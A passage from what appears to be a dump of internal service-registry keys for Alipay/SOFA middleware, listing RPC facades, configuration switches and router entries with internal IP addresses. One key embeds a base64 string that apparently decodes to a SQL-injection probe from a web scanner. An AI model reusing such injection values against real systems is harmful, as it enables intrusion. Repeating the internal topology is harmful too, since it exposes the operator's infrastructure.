A.DRM","com.alipay.iotbsp.business.facade.resultpage.ResultPageBuildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:JWJmJ1x0T3JcdGFudHdlYnNjYW5zWVc1MD1Nek13TWpRNE5qa3RMVEV4TURBd01qQXlNZw==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.cashpool.InnerLoanBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.drm.UctransSnapshotMsgDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.bizReconSyncInstDisputeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.55.99.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bbcmng.common.service.facade.CqcBranchPublishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:zmopenapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.knowledge.BotKnowledgeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cryptprod.common.service.client.model.envelope.envelopeResource.envelopeVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.client.SystemAppInvokeService:1.0:adtask@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.recruit.RecruitEnrollQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.paygrowth.common.service.facade.task.TaskOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.69.243.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilesearch.biz.rpc.service.QPFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HealthRedPaperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.activity.open.SaleDashboardOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publichome.biz.service.impl.rpc.MobileLifeAckCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.admin.ForumAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.72.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cardbin:name=com.alipay.cardbin.rule.switch.bizIdentifys,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antforest.common.service.facade.ForestAwardProvideFacade:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.specialModifyPid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcomment.common.service.facade.api.comment.CommentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpa.common.service.facade.deduct.api.MpaReceivePCSmsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mychain.baas.market.endpoint.facade.ContractTemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:das@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insxhbprod.common.service.facade.ActivePaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.BusinessTypeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.tenant.client.biz.service.UserService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanportal.facade.dsdd.DsddPullDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpaycore.common.stdbpay.service.BpayPrepareFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.189.252#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.discount.common.service.facade.test.DiscountAutoTestService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.UniDataConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.PensionBuyCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.alipassId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insusercenter.facade.history.api.InsUserHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.runtime.DeployFeedbackService:1.0:offline_stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.????#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imerchprod.globalsite.facade.api.contract.GlobalSiteContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.chargefront:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.138.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baoxianmerchant.common.service.api.InsMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.sdk.config.api.MemoryConfigFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.manage.merchant.MerchInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lego.common.service.facade.data.AppDenoiseMsgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.buffett.BuffettBusinessDistrictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.dal.tablestore.TableStoreConnectionClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.account.service.FinsignAccountCancelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bluearmyprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmcscore.facade.ServiceQualityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.ClearingCommandLfuCacheDrm.lfuCacheSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:shopBusinessTimeValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.policy.PricemngPricePolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcloanpromobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.legocloud.facade.proxy.hbase.HbaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.ioErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditbatch.service.BillBffProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.224#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iliquidity.biz.manager.report.ReportDataManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findecision.common.service.facade.autopress.AutoPressTestServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csccmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapConfigReloadDrm.betaCommandValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.23.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.234.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custview.facade.antgroup.AgInvolvedPartyRoleViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:oceanbase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityPlanSubjectModifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.darwin.release.releaseJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mpaasweb.common.service.facade.glaucus.GlaucusFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:financialCertifyCallBackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.bizprodmng.biz.shared.drm.impl.FieldControlConfigResourceImpl.supportControleScopeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.prodSiteHost,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csrobotmng.service.facade.wutong.WutongPatternFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rpartner.service.facade.RigelPermissionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:griver-quality#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-exriskcenter-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableHeadCarry,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finslip.pcconfigread.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fascore.common.service.facade.local.FundAssetLocalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insautomarket.common.facade.product.load.AutoMktProductLoadConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.96.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasset.common.service.facade.audit.DrawingAuditFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.RpcSpi:1.0:sdabombardier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpcmc.orderpool.credit.OrderCreditOperationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.InstitutionConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.ContentGroupConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.landlordgame.facade.api.RewardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.biz.service.cooperation.facade.CooperationActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_REALTIMECHECKERPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:kujuta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:promorulecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:antsecurity_securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserAccountArQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.newyear.EventTopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.core.api.biz.authority.AuthorityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.89.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:mpafront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.BigEventForLoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:insapportion_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.extend-request:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:tbapi@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.common.quickaccess.facade.service.open.OneStopService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.activityha.ActivityhaServiceSpi:1.0:monitorDataCheckService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.UserService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:lnrdCreditAddModifyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:apacquirecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_recovery_task.normalTaskPaused,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.76.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdistinguish.common.service.facade.ArExtendRecServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilerelation.common.service.facade.tlou.TlouPersonEntityRelationPersonSideStrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zcbsalescenter.common.service.facade.claim.facade.AssetClaimApplyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.core.service.task.plugin.manager.TaskPluginManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.biscenter.uem.common.service.facade.permission.v2.OperationPermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmng.service.facade.ctrl.FinmngBizModelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:peerpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditbatch.service.DebtCollectionDataManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantAccountGzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.membertangram.common.service.facade.config.CommonConfigService:1.0:commonConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyserver.common.service.facade.api.CsExpandJobFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchiscore_riskApproveProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesearch.biz.rest.PersonalAssistantRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_MQ_TEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.73.154.54#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.igfas.facade.api.RouteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.fullStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.api.template.TemplateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimdecision.common.service.assist.InsClaimOnlineBiQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.spi.RecommendFacade:1.0:channelRecommend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:antmember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditsentry.facade.toolplatform.ComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmodelpredict.common.service.facade.qualityprod.rpc.PredictService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxposition.service.facade.booking.InternalTradeAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.common.service.facade.api.operatedata.OperateDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.MyPointsSwitchResources.createMerchantFailDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.TaskCatService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.strategy.service.facade.api.serve.ServeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimitnear:name=com.alipay.rule.core.repository.drm.RepositoryConfigResource.repositoryLoaderTaskCoreSizeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.226.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:openbizmock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayutrprod.common.facade.monitor.BizLogSplitConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitydata.common.service.facade.rundata.RunDataService:1.0:securitydatacbackend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igfas.facade.api.FundServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:dsmp4int_antprocess_callback_revoke@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.migrate.PipelineMigrateOpenService:1.0:dppipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue33#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.23.244.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmng.common.spi.ControlBizFacade:1.0:test_controlBizFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.FundAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincontract.common.service.facade.ContractCenterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kborderprod.KopOrderSyncService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.salesplan.SalesPlanInfoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.core.service.TemplateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdtrans.common.service.facade.api.ProductCheckOfPdcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.biz.activity.service.StockService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mypointsprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.boss.facade.service.BossUserManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.BcBillUnifyImFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antemc.service.facade.WhiteBookFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:finnet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdchecker.service.analyze.facade.RiskEndToEndCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkassetmore.common.service.facade.api.InvestPlanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:iexratecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobilesrc.facade.PluginGroupDeployService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-gtdlife@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-george#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradecenter.core.service.repository.CommoditiesOrderRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_VOUCHER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchprod.api.ops.genericinvoke.SofaServiceHelper:1.0:itemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:miniPostAuditEndManagerProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yfdwebTBaseCache.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.yunfengdieweb:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayAccountRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DVProtocolMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gacplatform.facade.api.GacPlatformServiceFacade:1.0:fporgassetcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.clivemng.common.service.facade.api.resource.UnifySignService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.mcc.MccSwitchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.125#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finopencore.common.service.usertask.facade.TaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.datahubInfoLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.order.MerchantOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINSIGN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloantrade.service.invest.api.query.InvestBudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.order.HedgeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.zdic.common.entity.drm.RefreshCacheDrmConfig.refreshCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.opencore.service.facade.metadata.ModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbcateringprod.common.service.facade.front.FrontCookSpiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.userview.config.facade.UVLabelConfigManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.riskctrl.biz.velocity.store.VelocityStoreManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.facade.CompanyConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.worktask.facade.WorkTaskQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promokernel.common.service.facade.api.PrizeBudgetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CO